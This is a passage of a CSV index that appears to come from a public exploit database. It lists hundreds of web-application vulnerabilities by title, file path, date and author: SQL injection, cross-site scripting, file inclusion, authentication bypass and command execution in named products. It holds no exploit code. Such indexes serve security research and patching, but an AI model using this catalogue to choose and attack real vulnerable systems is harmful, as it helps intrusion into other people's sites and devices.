+30442,exploits/php/webapps/30442.txt,"WebDirector - 'index.php' Cross-Site Scripting",2007-08-01,r0t,webapps,php, +30443,exploits/php/webapps/30443.txt,"WordPress Theme Persuasion 2.x - Arbitrary File Download / File Deletion",2013-12-23,"Interference Security",webapps,php,80 +30445,exploits/php/webapps/30445.txt,"Joomla! Component Tour de France Pool 1.0.1 Module - MosConfig_absolute_path Remote File Inclusion",2007-08-02,Yollubunlar.Org,webapps,php, +30446,exploits/asp/webapps/30446.txt,"Hunkaray Okul Portali 1.1 - 'Duyuruoku.asp' SQL Injection",2007-08-02,Yollubunlar.Org,webapps,asp, +30448,exploits/php/webapps/30448.txt,"Lanius CMS 1.2.14 FAQ Module - 'mid' SQL Injection",2007-08-03,k1tk4t,webapps,php, +30449,exploits/php/webapps/30449.txt,"Lanius CMS 1.2.14 EZSHOPINGCART Module - 'cid' SQL Injection",2007-08-03,k1tk4t,webapps,php, +30450,exploits/php/webapps/30450.txt,"Lanius CMS 1.2.14 GALLERY Module - 'gid' SQL Injection",2007-08-03,k1tk4t,webapps,php, +30451,exploits/asp/webapps/30451.txt,"Next Gen Portfolio Manager - 'default.asp' Multiple SQL Injections",2007-08-03,"Aria-Security Team",webapps,asp, +30452,exploits/php/webapps/30452.txt,"J! Reactions 1.8.1 - comPath Remote File Inclusion",2007-08-04,Yollubunlar.Org,webapps,php, +30453,exploits/php/webapps/30453.txt,"snif 1.5.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-08-06,r0t,webapps,php, +30456,exploits/php/webapps/30456.txt,"VietPHP - '_functions.php?dirpath' Remote File Inclusion",2007-08-07,master-of-desastor,webapps,php, +30457,exploits/php/webapps/30457.txt,"VietPHP - '/admin/index.php?language' Remote File Inclusion",2007-08-07,master-of-desastor,webapps,php, +30810,exploits/php/webapps/30810.txt,"Proverbs Web Calendar 1.1 - 'Password' SQL Injection",2007-11-26,JosS,webapps,php, +30459,exploits/php/webapps/30459.txt,"VietPHP - 'index.php?language' Remote File Inclusion",2007-08-07,master-of-desastor,webapps,php, +30463,exploits/php/webapps/30463.txt,"Coppermine Photo Gallery 1.3/1.4 - 'YABBSE.INC.php' Remote File Inclusion",2007-08-08,Ma$tEr-0F-De$a$t0r,webapps,php, +30900,exploits/hardware/webapps/30900.html,"Feixun Wireless Router FWR-604H - Remote Code Execution",2014-01-14,"Arash Abedian",webapps,hardware,80 +30465,exploits/php/webapps/30465.txt,"Mapos-Scripts.de Gastebuch 1.5 - 'index.php' Remote File Inclusion",2007-08-09,Rizgar,webapps,php, +30466,exploits/php/webapps/30466.txt,"File Uploader 1.1 - 'index.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,webapps,php, +30467,exploits/php/webapps/30467.txt,"File Uploader 1.1 - 'datei.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,webapps,php, +30472,exploits/linux/webapps/30472.rb,"Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,webapps,linux,7071 +30475,exploits/cgi/webapps/30475.txt,"Synology DSM 4.3-3810 - Directory Traversal",2013-12-24,"Andrea Fabrizi",webapps,cgi,80 +30476,exploits/ios/webapps/30476.txt,"Song Exporter 2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,webapps,ios,80 +30478,exploits/php/webapps/30478.txt,"PHP MBB CMS 004 - Multiple Vulnerabilities",2013-12-24,cr4wl3r,webapps,php,80 +30479,exploits/php/webapps/30479.txt,"Shoutbox 1.0 - 'Shoutbox.php' Remote File Inclusion",2007-08-09,Rizgar,webapps,php, +30480,exploits/php/webapps/30480.txt,"Bilder Galerie 1.0 - 'index.php' Remote File Inclusion",2007-08-09,Rizgar,webapps,php, +30481,exploits/php/webapps/30481.txt,"Web News 1.1 - 'index.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,webapps,php, +30482,exploits/php/webapps/30482.txt,"Web News 1.1 - 'feed.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,webapps,php, +30483,exploits/php/webapps/30483.txt,"Web News 1.1 - 'news.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,webapps,php, +30486,exploits/php/webapps/30486.txt,"Lib2 PHP Library 0.2 - 'My_Statistics.php' Remote File Inclusion",2007-08-11,"ilker Kandemir",webapps,php, +30487,exploits/php/webapps/30487.txt,"PHP-Stats 0.1.9.2 - 'WhoIs.php' Cross-Site Scripting",2007-08-11,vasodipandora,webapps,php, +30488,exploits/php/webapps/30488.php,"Haudenschilt Family Connections 0.8 - 'index.php' Authentication Bypass",2007-08-11,"ilker Kandemir",webapps,php, +30489,exploits/php/webapps/30489.txt,"Openads (PHPAdsNew) < 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion",2007-08-11,Ma$tEr-0F-De$a$t0r,webapps,php, +30492,exploits/php/webapps/30492.txt,"SkilMatch Systems JobLister3 - 'index.php' SQL Injection",2007-07-13,joseph.giron13,webapps,php, +30501,exploits/php/webapps/30501.txt,"Systeme de vote pour site Web 1.0 - Multiple Remote File Inclusions",2007-07-09,Crackers_Child,webapps,php, +30504,exploits/php/webapps/30504.txt,"Olate Download 3.4.1 - 'admin.php' Remote Authentication Bypass",2007-07-16,imei,webapps,php, +30505,exploits/asp/webapps/30505.txt,"Text File Search Classic - 'TextFileSearch.asp' Cross-Site Scripting",2007-08-17,GeFORC3,webapps,asp, +30509,exploits/php/webapps/30509.txt,"Dalai Forum 1.1 - 'forumreply.php' Local File Inclusion",2007-08-20,DarKdewiL,webapps,php, +30510,exploits/php/webapps/30510.txt,"Firesoft - 'Class_TPL.php' Remote File Inclusion",2007-08-20,DarKdewiL,webapps,php, +30511,exploits/php/webapps/30511.txt,"Gurur Haber 2.0 - 'Uyeler2.php' SQL Injection",2007-08-20,dumenci,webapps,php, +30514,exploits/java/webapps/30514.txt,"ALeadSoft Search Engine Builder - Search.HTML Cross-Site Scripting",2007-08-21,MustLive,webapps,java, +30515,exploits/php/webapps/30515.txt,"coWiki - 'index.php' Cross-Site Scripting",2007-08-21,MustLive,webapps,php, +30516,exploits/php/webapps/30516.txt,"m-phorum 0.3 - 'index.php' Cross-Site Scripting",2007-08-21,CodeXpLoder'tq,webapps,php, +30518,exploits/php/webapps/30518.txt,"Ripe Website Manager 0.8.x - '/pages/delete_page.php?id' SQL Injection",2007-08-22,"Nagendra Kumar G",webapps,php, +30520,exploits/php/webapps/30520.txt,"WordPress 1.0.7 - 'Pool index.php' Cross-Site Scripting",2007-08-13,MustLive,webapps,php, +30525,exploits/php/webapps/30525.txt,"Arcadem 2.01 - 'index.php' Remote File Inclusion",2007-08-24,sm0k3,webapps,php, +30531,exploits/php/webapps/30531.txt,"AutoIndex PHP Script 2.2.1 - 'index.php' Cross-Site Scripting",2007-08-27,d3hydr8,webapps,php, +30533,exploits/php/webapps/30533.txt,"Dale Mooney Calendar Events - 'Viewevent.php' SQL Injection",2007-08-27,s0cratex,webapps,php, +30534,exploits/php/webapps/30534.txt,"PHPGedView 4.1 - 'login.php' Cross-Site Scripting",2007-08-27,"Joshua Morin",webapps,php, +30539,exploits/php/webapps/30539.txt,"ACG News 1.0 - 'index.php' Multiple SQL Injections",2007-08-28,SmOk3,webapps,php, +30541,exploits/asp/webapps/30541.txt,"Cisco CallManager 4.2 / CUCM 4.2 - Logon Page 'lang' SQL Injection",2007-08-29,anonymous,webapps,asp, +30545,exploits/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 - 'xlaapmview.asp' Cross-Site Scripting",2007-08-30,"Richard Brain",webapps,asp, +30547,exploits/hardware/webapps/30547.txt,"D-Link DSL-2750u ME_1.09 - Cross-Site Request Forgery",2013-12-28,"FIGHTERx war",webapps,hardware, +30969,exploits/php/webapps/30969.txt,"MODx 0.9.6.1 - 'AjaxSearch.php' Local File Inclusion",2008-01-02,"AmnPardaz Security Research Team",webapps,php, +31030,exploits/php/webapps/31030.pl,"WordPress Plugin SpamBam - Key Calculation Security Bypass",2007-01-15,Romero,webapps,php, +30872,exploits/php/webapps/30872.txt,"DomPHP 0.83 - SQL Injection",2014-01-13,Houssamix,webapps,php, +30553,exploits/php/webapps/30553.txt,"Toms Gästebuch 1.00 - 'form.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-07,cod3in,webapps,php, +30554,exploits/php/webapps/30554.txt,"Toms Gästebuch 1.00 - '/admin/header.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-07,cod3in,webapps,php, +30555,exploits/php/webapps/30555.txt,"MKPortal 1.0/1.1 - 'admin.php' Authentication Bypass",2007-09-03,Demential,webapps,php, +30556,exploits/php/webapps/30556.html,"Claroline 1.x - '/inc/lib/language.lib.php?language' Traversal Local File Inclusion",2007-09-03,"Fernando Munoz",webapps,php, +30557,exploits/php/webapps/30557.txt,"Claroline 1.x - '/admin/adminusers.php?dir' Cross-Site Scripting",2007-09-03,"Fernando Munoz",webapps,php, +30558,exploits/php/webapps/30558.txt,"Claroline 1.x - '/admin/advancedUserSearch.php?action' Cross-Site Scripting",2007-09-03,"Fernando Munoz",webapps,php, +30559,exploits/php/webapps/30559.txt,"Claroline 1.x - '/admin/campusProblem.php?view' Cross-Site Scripting",2007-09-03,"Fernando Munoz",webapps,php, +30560,exploits/php/webapps/30560.txt,"212Cafe WebBoard 6.30 - 'Read.php' SQL Injection",2007-09-04,"Lopez Bran Digrap",webapps,php, +31025,exploits/cgi/webapps/31025.txt,"Garment Center - 'index.cgi' Local File Inclusion",2008-01-14,Smasher,webapps,cgi, +30877,exploits/php/webapps/30877.txt,"Roundcube Webmail 0.1 - CSS Expression Input Validation",2007-11-10,"Tomas Kuliavas",webapps,php, +30878,exploits/php/webapps/30878.txt,"Bitweaver 1.x/2.0 - 'users/register.php' Cross-Site Scripting",2007-11-10,Doz,webapps,php, +30879,exploits/php/webapps/30879.txt,"Bitweaver 1.x/2.0 - 'search/index.php' Cross-Site Scripting",2007-11-10,Doz,webapps,php, +30880,exploits/php/webapps/30880.txt,"Bitweaver 1.x/2.0 - '/search/index.php?highlight' SQL Injection",2007-11-10,Doz,webapps,php, +30881,exploits/php/webapps/30881.txt,"PHP-Nuke 8.0 - 'autohtml.php' Local File Inclusion",2007-11-10,d3v1l,webapps,php, +30563,exploits/jsp/webapps/30563.txt,"Apache Tomcat 5.5.15 - cal2.jsp Cross-Site Scripting",2007-09-04,"Tushar Vartak",webapps,jsp, +30564,exploits/asp/webapps/30564.txt,"E-Smart Cart 1.0 - 'login.asp' SQL Injection",2007-09-04,SmOk3,webapps,asp, +30568,exploits/php/webapps/30568.txt,"Pulsewiki And Pawfaliki 0.5.1 - 'index.php' Local File Inclusion",2007-09-06,mafialbano,webapps,php, +30570,exploits/php/webapps/30570.txt,"Toms Gastebuch 1.00/1.01 - 'header.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-08,hd1979,webapps,php, +30571,exploits/asp/webapps/30571.txt,"Proxy Anket 3.0.1 - 'anket.asp' SQL Injection",2007-09-10,Yollubunlar.Org,webapps,asp, +30572,exploits/php/webapps/30572.txt,"PHPMyQuote 0.20 - '/index.php' SQL Injection / Cross-Site Scripting",2007-09-10,Yollubunlar.Org,webapps,php, +30573,exploits/php/webapps/30573.txt,"SisfoKampus - 'dwoprn.php' Arbitrary File Download",2007-09-10,PUPET,webapps,php, +30575,exploits/php/webapps/30575.txt,"BOINC 5.10.20 - 'forum_forum.php?id' Cross-Site Scripting",2007-09-12,Doz,webapps,php, +30576,exploits/php/webapps/30576.txt,"BOINC 5.10.20 - 'text_search_action.php?search_string' Cross-Site Scripting",2007-09-12,Doz,webapps,php, +30577,exploits/php/webapps/30577.txt,"SWSoft Plesk 8.2 - 'login.php3' PLESKSESSID Cookie SQL Injection",2007-09-12,"Nick I Merritt",webapps,php, +32387,exploits/php/webapps/32387.txt,"Quick CMS Lite 2.1 - 'admin.php' Cross-Site Scripting",2008-09-16,"John Cobb",webapps,php, +32415,exploits/php/webapps/32415.txt,"Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Injections",2008-09-24,"Justin C. Klein Keane",webapps,php, +32413,exploits/php/webapps/32413.txt,"InterTech WCMS - 'etemplate.php' SQL Injection",2008-09-23,"GeNiUs IrAQI",webapps,php, +32412,exploits/asp/webapps/32412.txt,"Omnicom Content Platform - 'browser.asp' Directory Traversal",2008-09-23,AlbaniaN-[H],webapps,asp, +32411,exploits/php/webapps/32411.txt,"Datalife Engine CMS 7.2 - 'admin.php' Cross-Site Scripting",2008-09-23,"Hadi Kiamarsi",webapps,php, +32410,exploits/php/webapps/32410.txt,"6rbScript - 'cat.php' SQL Injection",2008-09-22,"Karar Alshami",webapps,php, +32389,exploits/php/webapps/32389.txt,"Quick Cart 3.1 - 'admin.php' Cross-Site Scripting",2008-09-17,"John Cobb",webapps,php, +32409,exploits/php/webapps/32409.txt,"Achievo 1.3.2 - 'atknodetype' Cross-Site Scripting",2008-09-20,"Rohit Bansal",webapps,php, +32408,exploits/php/webapps/32408.txt,"BlueCUBE CMS - 'tienda.php' SQL Injection",2008-09-21,r45c4l,webapps,php, +32407,exploits/php/webapps/32407.txt,"BLUEPAGE CMS 2.5 - 'PHPSESSID' Session Fixation",2008-09-22,"David Vieira-Kurz",webapps,php, +32406,exploits/php/webapps/32406.txt,"xt:Commerce 3.04 - 'XTCsid' Session Fixation",2008-09-22,"David Vieira-Kurz",webapps,php, +32405,exploits/php/webapps/32405.txt,"xt:Commerce 3.04 - 'advanced_search_result.php?keywords' Cross-Site Scripting",2008-09-22,"David Vieira-Kurz",webapps,php, +32404,exploits/php/webapps/32404.html,"Fuzzylime (cms) 3.0 - 'usercheck.php' Cross-Site Scripting",2008-09-22,"Fabian Fingerle",webapps,php, +32403,exploits/php/webapps/32403.txt,"MapCal 0.1 - 'id' SQL Injection",2008-09-22,0x90,webapps,php, +32402,exploits/php/webapps/32402.txt,"UNAK-CMS - Cookie Authentication Bypass",2008-09-22,Ciph3r,webapps,php, +32401,exploits/asp/webapps/32401.txt,"rgb72 WCMS 1.0 - 'index.php' SQL Injection",2008-09-22,"CWH Underground",webapps,asp, +35491,exploits/php/webapps/35491.txt,"PBBoard CMS - Persistent Cross-Site Scripting",2014-12-08,"Manish Tanwar",webapps,php, +32398,exploits/php/webapps/32398.txt,"eXtrovert software Thyme 1.3 - 'add_calendars.php' Cross-Site Scripting",2008-09-21,"DigiTrust Group",webapps,php, +32397,exploits/php/webapps/32397.txt,"PHP Pro Bid 5.2.4/6.04 - Multiple SQL Injections",2008-09-19,"Jan Van Niekerk",webapps,php, +32396,exploits/php/webapps/32396.txt,"Parallels H-Sphere 3.0/3.1 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-19,t0fx,webapps,php, +32395,exploits/php/webapps/32395.txt,"HyperStop WebHost Directory 1.2 - Database Disclosure",2008-09-19,r45c4l,webapps,php, +32394,exploits/asp/webapps/32394.txt,"Sama Educational Management System - 'error.asp' Cross-Site Scripting",2008-09-18,Lagon666,webapps,asp, +32392,exploits/php/webapps/32392.pl,"Add a link 4 - Security Bypass / SQL Injection",2008-09-17,JosS,webapps,php, +32388,exploits/php/webapps/32388.txt,"Cars & Vehicle - 'page.php' SQL Injection",2008-09-17,"Hussin X",webapps,php, +33984,exploits/hardware/webapps/33984.rb,"NETGEAR WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)",2014-07-07,c1ph04,webapps,hardware, +30581,exploits/php/webapps/30581.txt,"CS-Guestbook 0.1 - Login Credentials Information Disclosure",2007-09-12,Cr@zy_King,webapps,php, +30583,exploits/php/webapps/30583.txt,"PHP-Stats 0.1.9.2 - 'Tracking.php' Cross-Site Scripting",2007-09-14,root@hanicker.it,webapps,php, +30585,exploits/cgi/webapps/30585.txt,"Axis Communications 207W Network Camera - Web Interface axis-cgi/admin/restart.cgi Cross-Site Request Forgery",2007-09-14,"Seth Fogie",webapps,cgi, +30586,exploits/cgi/webapps/30586.txt,"Axis Communications 207W Network Camera - Web Interface 'axis-cgi/admin/pwdgrp.cgi' Multiple Cross-Site Request Forgery Vulnerabilities",2007-09-14,"Seth Fogie",webapps,cgi, +30587,exploits/cgi/webapps/30587.txt,"Axis Communications 207W Network Camera - Web Interface '/admin/restartMessage.shtml?server' Cross-Site Request Forgery",2007-09-14,"Seth Fogie",webapps,cgi, +30588,exploits/php/webapps/30588.txt,"ewire Payment Client 1.60/1.70 - Command Execution",2007-09-17,anonymous,webapps,php, +30591,exploits/cgi/webapps/30591.txt,"Alcatel-Lucent OmniPCX Enterprise 7.1 - Remote Command Execution",2007-09-17,"RedTeam Pentesting GmbH",webapps,cgi, +30594,exploits/php/webapps/30594.txt,"Coppermine Photo Gallery 1.4.12 - 'referer' Cross-Site Scripting",2007-09-17,L4teral,webapps,php, +30595,exploits/php/webapps/30595.txt,"Coppermine Photo Gallery 1.4.12 - 'log' Local File Inclusion",2007-09-17,L4teral,webapps,php, +30596,exploits/php/webapps/30596.txt,"b1gMail 6.3.1 - 'hilfe.php' Cross-Site Scripting",2007-09-17,malibu.r,webapps,php, +30597,exploits/cgi/webapps/30597.txt,"LevelOne WBR3404TX Broadband Router - 'RC' Cross-Site Scripting",2007-09-19,azizov,webapps,cgi, +30598,exploits/cgi/webapps/30598.txt,"WebBatch - 'webbatch.exe' Cross-Site Scripting",2007-09-20,Doz,webapps,cgi, +30599,exploits/cgi/webapps/30599.txt,"WebBatch - 'webbatch.exe?dumpinputdata' Remote Information Disclosure",2007-09-20,Doz,webapps,cgi, +30601,exploits/php/webapps/30601.txt,"Vigile CMS 1.8 Wiki Module - Multiple Cross-Site Scripting Vulnerabilities",2007-09-20,x0kster,webapps,php, +30602,exploits/php/webapps/30602.html,"WordPress 2.0 - 'wp-register.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-22,"Adrian Pastor",webapps,php, +30603,exploits/php/webapps/30603.html,"XCMS 1.1/1.7 - 'Password' Arbitrary PHP Code Execution",2007-09-22,x0kster,webapps,php, +30606,exploits/cgi/webapps/30606.txt,"Urchin 5.7.x - 'session.cgi' Cross-Site Scripting",2007-09-24,pagvac,webapps,cgi, +30607,exploits/php/webapps/30607.txt,"bcoos 1.0.10 Arcade Module - 'index.php' SQL Injection",2007-09-24,"nights shadow",webapps,php, +30608,exploits/jsp/webapps/30608.txt,"JSPWiki 2.5.139 - 'NewGroup.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",webapps,jsp, +30609,exploits/jsp/webapps/30609.txt,"JSPWiki 2.5.139 - 'edit.jsp?edittime' Cross-Site Scripting",2007-09-25,"Jason Kratzer",webapps,jsp, +30610,exploits/jsp/webapps/30610.txt,"JSPWiki 2.5.139 - 'Comment.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",webapps,jsp, +30611,exploits/jsp/webapps/30611.txt,"JSPWiki 2.5.139 - 'UserPreferences.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",webapps,jsp, +30612,exploits/jsp/webapps/30612.txt,"JSPWiki 2.5.139 - 'Login.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",webapps,jsp, +30613,exploits/jsp/webapps/30613.txt,"JSPWiki 2.5.139 - 'Diff.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",webapps,jsp, +30614,exploits/php/webapps/30614.txt,"PHP-Nuke Dance Music Module - 'index.php' Local File Inclusion",2007-09-25,waraxe,webapps,php, +30615,exploits/php/webapps/30615.txt,"SimpGB 1.46.2 - '/admin/?l_username' Cross-Site Scripting",2007-09-25,netVigilance,webapps,php, +30616,exploits/php/webapps/30616.txt,"SimpGB 1.46.2 - '/admin/emoticonlist.php?l_emoticonlist' Cross-Site Scripting",2007-09-25,netVigilance,webapps,php, +30617,exploits/php/webapps/30617.txt,"SimpNews 2.41.3 - 'l_username' Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",webapps,php, +30618,exploits/php/webapps/30618.txt,"SimpNews 2.41.3 - 'backurl' Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",webapps,php, +30621,exploits/asp/webapps/30621.txt,"Novus 1.0 - 'Buscar.asp' Cross-Site Scripting",2007-09-27,Zutr4,webapps,asp, +30623,exploits/php/webapps/30623.pl,"MD-Pro 1.0.76 - 'index.php' Firefox ID SQL Injection",2007-09-29,"unidentified1_ is",webapps,php, +30624,exploits/asp/webapps/30624.txt,"Netkamp Emlak Scripti - Multiple Input Validation Vulnerabilities",2007-10-01,GeFORC3,webapps,asp, +30625,exploits/asp/webapps/30625.txt,"Ohesa Emlak Portal 1.0 - 'satilik.asp?Kategori' SQL Injection",2007-10-01,GeFORC3,webapps,asp, +30626,exploits/asp/webapps/30626.txt,"Ohesa Emlak Portal 1.0 - 'detay.asp?Emlak' SQL Injection",2007-10-01,GeFORC3,webapps,asp, +30629,exploits/asp/webapps/30629.txt,"ASP Product Catalog 1.0 - 'default.asp' SQL Injection",2007-10-01,joseph.giron13,webapps,asp, +30632,exploits/php/webapps/30632.txt,"DRBGuestbook 1.1.13 - 'index.php' Cross-Site Scripting",2007-10-03,Gokhan,webapps,php, +30633,exploits/php/webapps/30633.txt,"Uebimiau Webmail 2.7.x - 'index.php' Cross-Site Scripting",2007-10-03,"Ivan Sanches",webapps,php, +30634,exploits/php/webapps/30634.txt,"Content Builder 0.7.5 - 'postComment.php' Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",webapps,php, +30637,exploits/php/webapps/30637.js,"WordPress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery",2007-10-04,"David Kierznowski",webapps,php, +30638,exploits/php/webapps/30638.txt,"GForge 4.6/4.5/3.1 - 'Verify.php' Cross-Site Scripting",2007-10-04,"Jose Sanchez",webapps,php, +30968,exploits/php/webapps/30968.txt,"MODx 0.9.6.1 - 'htcmime.php' Source Code Information Disclosure",2008-01-02,"AmnPardaz Security Research Team",webapps,php, +30639,exploits/cgi/webapps/30639.txt,"Cart32 6.x - GetImage Arbitrary File Download",2007-10-04,"Paul Craig",webapps,cgi, +30640,exploits/php/webapps/30640.txt,"Stuffed Guys Stuffed Tracker - Multiple Cross-Site Scripting Vulnerabilities",2007-10-04,"Aria-Security Team",webapps,php, +30641,exploits/php/webapps/30641.txt,"AfterLogic MailBee WebMail Pro 3.x - 'login.php?mode' Cross-Site Scripting",2007-10-05,"Ivan Sanchez",webapps,php, +30642,exploits/php/webapps/30642.txt,"AfterLogic MailBee WebMail Pro 3.x - 'default.asp?mode2' Cross-Site Scripting",2007-10-05,"Ivan Sanchez",webapps,php, +30647,exploits/php/webapps/30647.txt,"SNewsCMS 2.1 - 'News_page.php' Cross-Site Scripting",2007-10-08,medconsultation.ru,webapps,php, +30649,exploits/cgi/webapps/30649.txt,"NetWin DNews - 'Dnewsweb.exe' Multiple Cross-Site Scripting Vulnerabilities",2007-10-09,Doz,webapps,cgi, +30651,exploits/php/webapps/30651.txt,"Joomla! Component WebMaster-Tips.net Joomla! RSS Feed Reader 1.0 - Remote File Inclusion",2007-10-10,Cyber-Crime,webapps,php, +30653,exploits/php/webapps/30653.txt,"phpMyAdmin 2.11.1 - 'setup.php' Cross-Site Scripting",2007-10-09,"Omer Singer",webapps,php, +30654,exploits/php/webapps/30654.txt,"ActiveKB NX 2.6 - 'index.php' Cross-Site Scripting",2007-10-11,durito,webapps,php, +30655,exploits/php/webapps/30655.txt,"Joomla! Component Search 1.0.13 - SearchWord Cross-Site Scripting",2007-10-11,MustLive,webapps,php, +30656,exploits/php/webapps/30656.txt,"BoastMachine 2.8 - 'index.php' Local File Inclusion",2007-10-11,iNs,webapps,php, +30657,exploits/php/webapps/30657.txt,"UMI CMS - 'index.php' Cross-Site Scripting",2007-10-11,anonymous,webapps,php, +30658,exploits/php/webapps/30658.txt,"CRS Manager - Multiple Remote File Inclusions",2007-10-11,iNs,webapps,php, +30659,exploits/php/webapps/30659.txt,"Nucleus CMS 3.0.1 - 'index.php' Cross-Site Scripting",2007-10-11,MustLive,webapps,php, +30660,exploits/php/webapps/30660.txt,"Scott Manktelow Design Stride 1.0 Courses - 'detail.php' Multiple SQL Injections",2007-10-11,durito,webapps,php, +30661,exploits/cgi/webapps/30661.txt,"Google Urchin 5.7.3 - 'Report.cgi' Authentication Bypass",2007-10-11,MustLive,webapps,cgi, +30662,exploits/php/webapps/30662.txt,"Scott Manktelow Design Stride 1.0 - 'Content Management System main.php' SQL Injection",2007-10-11,durito,webapps,php, +30663,exploits/php/webapps/30663.txt,"Linkliste 1.2 - 'index.php' Multiple Remote File Inclusions",2007-10-11,iNs,webapps,php, +30664,exploits/php/webapps/30664.txt,"Scott Manktelow Design Stride 1.0 - 'Merchant shop.php' SQL Injection",2007-10-11,durito,webapps,php, +30665,exploits/hardware/webapps/30665.txt,"Nisuta NS-WIR150NE / NS-WIR300N Wireless Routers - Remote Management Web Interface Authentication Bypass",2014-01-03,"Amplia Security Advisories",webapps,hardware, +30667,exploits/hardware/webapps/30667.txt,"Technicolor TC7200 - Multiple Cross-Site Request Forgery Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",webapps,hardware, +30668,exploits/hardware/webapps/30668.txt,"Technicolor TC7200 - Multiple Cross-Site Scripting Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",webapps,hardware, +30669,exploits/windows/webapps/30669.txt,"DirectControlTM 3.1.7.0 - Multiple Vulnerabilities",2014-01-03,"mohamad ch",webapps,windows, +30865,exploits/php/webapps/30865.txt,"DomPHP 0.83 - Local Directory Traversal",2014-01-12,Houssamix,webapps,php, +30795,exploits/cgi/webapps/30795.txt,"GWExtranet - Multiple Directory Traversal Vulnerabilities",2007-11-21,joseph.giron13,webapps,cgi, +30796,exploits/asp/webapps/30796.txt,"E-vanced Solutions E-vents 5.0 - Multiple Input Validation Vulnerabilities",2007-11-21,joseph.giron13,webapps,asp, +31530,exploits/php/webapps/31530.txt,"Joomla! / Mambo Component Download3000 1.0 - 'id' SQL Injection",2008-03-23,S@BUN,webapps,php, +31531,exploits/php/webapps/31531.pl,"Bomba Haber 2.0 - 'haberoku.php' SQL Injection",2008-03-25,cOndemned,webapps,php, +30674,exploits/java/webapps/30674.txt,"Stringbeans Portal 3.2 Projects Script - Cross-Site Scripting",2007-10-15,JosS,webapps,java, +30675,exploits/jsp/webapps/30675.txt,"InnovaPortal - 'tc/contents/home001.jsp?contentid' Cross-Site Scripting",2007-10-15,JosS,webapps,jsp, +30676,exploits/jsp/webapps/30676.txt,"InnovaPortal - 'msg.jsp?msg' Cross-Site Scripting",2007-10-15,JosS,webapps,jsp, +30682,exploits/php/webapps/30682.txt,"SiteBar 3.3.8 - 'translator.php?dir' Traversal Arbitrary File Access",2007-10-18,"Robert Buchholz",webapps,php, +30683,exploits/php/webapps/30683.txt,"SiteBar 3.3.8 - '/translator.php?upd/cmd/Action/edit' Arbitrary PHP Code Execution",2007-10-18,"Robert Buchholz",webapps,php, +30684,exploits/php/webapps/30684.txt,"SiteBar 3.3.8 - 'integrator.php?lang' Cross-Site Scripting",2007-10-18,"Robert Buchholz",webapps,php, +30685,exploits/php/webapps/30685.txt,"SiteBar 3.3.8 - 'index.php?target' Cross-Site Scripting",2007-10-18,"Robert Buchholz",webapps,php, +30686,exploits/php/webapps/30686.txt,"SiteBar 3.3.8 - 'command.php?Modify User Action uid' Cross-Site Scripting",2007-10-18,"Robert Buchholz",webapps,php, +30804,exploits/php/webapps/30804.txt,"VBTube 1.1 - Search Cross-Site Scripting",2007-11-24,Crackers_Child,webapps,php, +30689,exploits/php/webapps/30689.php,"Taboada Macronews 1.0 - SQL Injection",2014-01-04,Jefrey,webapps,php, +31027,exploits/php/webapps/31027.txt,"pMachine Pro 2.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,webapps,php, +31028,exploits/php/webapps/31028.txt,"Article Dashboard - '/admin/login.php' Multiple SQL Injections",2008-01-15,Xcross87,webapps,php, +31029,exploits/php/webapps/31029.pl,"WordPress Plugin Peter's Math Anti-Spam 0.1.6 - Audio CAPTCHA Security Bypass",2008-01-15,Romero,webapps,php, +30691,exploits/php/webapps/30691.txt,"Alcatel Lucent Omnivista 4760 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",webapps,php, +30693,exploits/php/webapps/30693.txt,"SocketKB 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",webapps,php, +30694,exploits/php/webapps/30694.txt,"Socketmail 2.2.1 - 'lostpwd.php' Cross-Site Scripting",2007-10-19,"Ivan Sanchez",webapps,php, +30695,exploits/php/webapps/30695.txt,"rNote 0.9.7 - 'rnote.php' Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,RoMaNcYxHaCkEr,webapps,php, +30696,exploits/asp/webapps/30696.txt,"SearchSimon Lite 1.0 - 'Filename.asp' Cross-Site Scripting",2007-10-20,"Aria-Security Team",webapps,asp, +30697,exploits/php/webapps/30697.txt,"ReloadCMS 1.2.5 - 'index.php' Local File Inclusion",2007-10-20,sekuru,webapps,php, +30698,exploits/php/webapps/30698.txt,"Flatnuke3 File Manager Module - Unauthorized Access",2007-10-22,KiNgOfThEwOrLd,webapps,php, +30699,exploits/php/webapps/30699.txt,"Hackish 1.1 - 'Blocco.php' Cross-Site Scripting",2007-10-22,Matrix86,webapps,php, +30700,exploits/php/webapps/30700.txt,"deeemm CMS (dmcms) 0.7 - 'index.php' SQL Injection",2007-10-22,"Aria-Security Team",webapps,php, +30701,exploits/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - 